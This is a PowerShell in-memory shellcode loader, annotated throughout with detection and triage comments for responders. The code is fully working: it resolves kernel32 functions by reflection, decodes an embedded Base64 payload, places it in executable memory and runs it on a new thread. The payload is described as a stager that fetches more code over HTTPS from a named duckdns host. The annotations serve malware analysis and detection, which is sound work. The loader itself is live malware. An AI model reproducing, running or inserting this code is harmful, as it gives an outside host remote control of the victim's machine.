- # x9L: looks up the address of a native export by reflection, with no Add-Type or DllImport declaration in the script.
- #   $jHxP  - module name passed to GetModuleHandle (the calls further down pass kernel32.dll)
- #   $oLaAb - export name passed to GetProcAddress
- # Returns the value GetProcAddress returns for that module/export pair.
- # NOTE(review): function and variable names look randomly generated, so they are poor detection keys.
- # The string literals 'Microsoft.Win32.UnsafeNativeMethods', 'GetProcAddress' and 'GetModuleHandle' are not renamed
- # and are better match terms for PowerShell script block logging (event 4104) and AMSI-based inspection.
- function x9L {
- Param ($jHxP, $oLaAb)
- # Pick the GAC-loaded System.dll out of the assemblies already in this AppDomain and fetch the type Microsoft.Win32.UnsafeNativeMethods from it by name.
- $oxkS = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
- # Invoke that type's GetModuleHandle($jHxP), wrap the handle in a HandleRef, and pass it with $oLaAb to the GetProcAddress(HandleRef, String) overload.
- return $oxkS.GetMethod('GetProcAddress', [Type[]]@([System.Runtime.InteropServices.HandleRef], [String])).Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($oxkS.GetMethod('GetModuleHandle')).Invoke($null, @($jHxP)))), $oLaAb))
- }
- # wJfh: builds a delegate type at run time with System.Reflection.Emit and returns it.
- #   $ooHV - parameter types of the delegate's Invoke method (mandatory)
- #   $f2m  - return type of Invoke; defaults to [Void]
- # The returned type is what the statements after this function hand to Marshal.GetDelegateForFunctionPointer,
- # so that a raw function address can be called with a matching signature.
- # NOTE(review): the assembly is created with AssemblyBuilderAccess.Run (run-only, not saveable), so no file on disk is expected to back this type.
- # The fixed names 'ReflectedDelegate', 'InMemoryModule' and 'MyDelegateType' are literal strings and are usable
- # hunting terms in script block logs.
- function wJfh {
- Param (
- [Parameter(Position = 0, Mandatory = $True)] [Type[]] $ooHV,
- [Parameter(Position = 1)] [Type] $f2m = [Void]
- )
- # Dynamic assembly 'ReflectedDelegate' -> module 'InMemoryModule' -> sealed public class 'MyDelegateType' deriving from MulticastDelegate.
- $gMrff = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
- # Constructor and Invoke are declared with 'Runtime, Managed' implementation flags: the CLR supplies the bodies, as it does for any delegate type.
- $gMrff.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $ooHV).SetImplementationFlags('Runtime, Managed')
- $gMrff.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $f2m, $ooHV).SetImplementationFlags('Runtime, Managed')
- return $gMrff.CreateType()
- }
- # Main sequence: decode an embedded byte blob, copy it into newly allocated executable memory, and run it on a new thread.
- # Triage summary for responders: no file is written by these statements; the observable artifacts are the script text itself
- # (script block logging / AMSI), an RWX private memory region inside the PowerShell process, a thread starting in that region,
- # and any network traffic the blob generates.
- #
- # $d2p holds the Base64-decoded blob. Strings readable in the decoded bytes include the library name "wininet",
- # the User-Agent "Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko", a long random-looking URI path,
- # the host 14ardeee14[.]duckdns[.]org and the value 443 (0x01BB) pushed as a port.
- # NOTE(review): the byte layout looks like 32-bit x86 code and is consistent with a staged HTTPS downloader that fetches
- # further code from that host and runs it in memory - confirm in a disassembler or sandbox before relying on this.
- [Byte[]]$d2p = [System.Convert]::FromBase64String("/OiCAAAAYInlMcBki1Awi1IMi1IUi3IoD7dKJjH/rDxhfAIsIMHPDQHH4vJSV4tSEItKPItMEXjjSAHRUYtZIAHTi0kY4zpJizSLAdYx/6zBzw0BxzjgdfYDffg7fSR15FiLWCQB02aLDEuLWBwB04sEiwHQiUQkJFtbYVlaUf/gX19aixLrjV1obmV0AGh3aW5pVGhMdyYH/9Ux21NTU1NT6D4AAABNb3ppbGxhLzUuMCAoV2luZG93cyBOVCA2LjE7IFRyaWRlbnQvNy4wOyBydjoxMS4wKSBsaWtlIEdlY2tvAGg6Vnmn/9VTU2oDU1NouwEAAOjIAAAAL2llVGQ1Z1BoT3ZTVDhKTHh6MzQyWFFKSDl2RGFsNVMtYi05akszZ25LMWU2OW94XzdFNmgzMnMAUGhXiZ/G/9WJxlNoADLghFNTU1dTVmjrVS47/9WWagpfaIAzAACJ4GoEUGofVmh1Rp6G/9VTU1NTVmgtBhh7/9WFwHUUaIgTAABoRPA14P/VT3XN6FMAAABqQGgAEAAAaAAAQABTaFikU+X/1ZNTU4nnV2gAIAAAU1ZoEpaJ4v/VhcB0z4sHAcOFwHXlWMNf6Gv///8xNGFyZGVlZTE0LmR1Y2tkbnMub3JnALvwtaJWagBT/9U=")
- # Resolve kernel32!VirtualAlloc through x9L, wrap it in a delegate typed by wJfh, and allocate $d2p.Length bytes.
- # 0x3000 = MEM_COMMIT | MEM_RESERVE; 0x40 = PAGE_EXECUTE_READWRITE. A private RWX region in powershell.exe is a
- # common memory-scanner / EDR signal.
- $pqbCz = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((x9L kernel32.dll VirtualAlloc), (wJfh @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr]))).Invoke([IntPtr]::Zero, $d2p.Length,0x3000, 0x40)
- # Copy the decoded bytes into the allocated region.
- [System.Runtime.InteropServices.Marshal]::Copy($d2p, 0, $pqbCz, $d2p.length)
- # Resolve kernel32!CreateThread and start a thread whose entry point is the allocated region ($pqbCz); $jW receives the thread handle.
- $jW = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((x9L kernel32.dll CreateThread), (wJfh @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr]))).Invoke([IntPtr]::Zero,0,$pqbCz,[IntPtr]::Zero,0,[IntPtr]::Zero)
- # Resolve kernel32!WaitForSingleObject and wait on the thread handle with timeout 0xffffffff (INFINITE), so the
- # PowerShell host stays alive while the thread runs; output is discarded.
- [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((x9L kernel32.dll WaitForSingleObject), (wJfh @([IntPtr], [Int32]))).Invoke($jW,0xffffffff) | Out-Null